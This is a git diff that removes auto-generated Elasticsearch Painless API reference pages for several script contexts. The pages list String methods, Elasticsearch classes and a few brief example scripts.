a/docs/painless/painless-api-reference/painless-api-reference-analysis/index.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -// This file is auto-generated. Do not edit. 
- -[[painless-api-reference-analysis]] -=== Analysis API - -The following specialized API is available in the Analysis context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.analysis.common -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-analysis/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-analysis/packages.asciidoc deleted file mode 100644 index b5052084ee0..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-analysis/packages.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-analysis-java-lang"] -=== Analysis API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-analysis-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void 
{java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-analysis-org-elasticsearch-analysis-common"] -=== Analysis API for package org.elasticsearch.analysis.common -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-analysis-AnalysisPredicateScript-Token]] -==== AnalysisPredicateScript.Token -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int getEndOffset() -* int getPosition() -* int getPositionIncrement() -* int getPositionLength() -* int getStartOffset() -* CharSequence getTerm() -* String getType() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean isKeyword() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/index.asciidoc deleted file mode 100644 index f63ba71423c..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-bucket-aggregation]] -=== Bucket Aggregation API - -The following specialized API is available in the Bucket Aggregation context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/packages.asciidoc deleted file mode 100644 index e77ea8fb473..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-bucket-aggregation-java-lang"] -=== Bucket Aggregation API for package java.lang -See the <> for a high-level overview of all packages and classes. 
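The `java.lang.String` listing below repeats, nearly verbatim, in most contexts. A few of its entries are Painless-specific augmentations rather than JDK methods; the following hedged sketch exercises two of them (`splitOnToken` and the Base64 helpers) on a made-up value.

[source,painless]
----
// Hypothetical input; splitOnToken, encodeBase64 and decodeBase64 are the
// Painless String augmentations listed below.
String csv = 'a,b,c';
String[] parts = csv.splitOnToken(',');   // ['a', 'b', 'c']
String encoded = csv.encodeBase64();
return encoded.decodeBase64() == csv;     // true
----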
- -[[painless-api-reference-bucket-aggregation-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-field/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-field/index.asciidoc deleted file mode 100644 index ac04e923a89..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-field/index.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-field]] -=== Field API - -The following specialized API is available in the Field context. - -* See the <> for further API available in all contexts. - -==== Static Methods -The following methods are directly callable without a class/instance qualifier. Note parameters denoted by a (*) are treated as read-only values. - -* List domainSplit(String) -* List domainSplit(String, Map) - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-field/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-field/packages.asciidoc deleted file mode 100644 index bc6b6601924..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-field/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-field-java-lang"] -=== Field API for package java.lang -See the <> for a high-level overview of all packages and classes. 
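As a quick illustration of the `domainSplit` static methods listed earlier under the Field context's Static Methods, here is a hedged sketch; the host value is made up, and the assumption that the returned `List` holds the subdomain followed by the highest registered domain should be checked against the reference.

[source,painless]
----
// Hypothetical host name; domainSplit(String) is the static method listed above.
// Assumption: element 0 is the subdomain, element 1 the highest registered domain.
String host = 'www.kibana.elastic.co';
List parts = domainSplit(host);
return parts.get(1);   // e.g. 'elastic.co'
----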
- -[[painless-api-reference-field-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-field-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== Field API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-field-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-field-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== Field API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-field-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-field-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-filter/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-filter/index.asciidoc deleted file mode 100644 index 0b69b3b1501..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-filter/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -// This file is auto-generated. Do not edit. 
- -[[painless-api-reference-filter]] -=== Filter API - -The following specialized API is available in the Filter context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-filter/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-filter/packages.asciidoc deleted file mode 100644 index 462566d1fb6..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-filter/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-filter-java-lang"] -=== Filter API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-filter-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-filter-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== Filter API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-filter-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-filter-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== Filter API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-filter-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-filter-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-ingest/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-ingest/index.asciidoc deleted file mode 100644 index 7b53fe84af6..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-ingest/index.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-ingest]] -=== Ingest API - -The following specialized API is available in the Ingest context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.ingest.common -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-ingest/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-ingest/packages.asciidoc deleted file mode 100644 index dddb566afca..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-ingest/packages.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-ingest-java-lang"] -=== Ingest API for package java.lang -See the <> for a high-level overview of all packages and classes. 
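A minimal sketch of an ingest `script` processor body using this context. The `ctx` document map comes from the shared Ingest bindings, not from this listing, and the field names are hypothetical; `sha256()` and `Processors.lowercase()` are taken from the methods documented below.

[source,painless]
----
// Normalize a field and store its hash alongside it.
def email = ctx['user_email'];               // hypothetical field
if (email != null) {
  ctx['user_email'] = Processors.lowercase(email);
  ctx['user_email_hash'] = ctx['user_email'].sha256();
}
----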
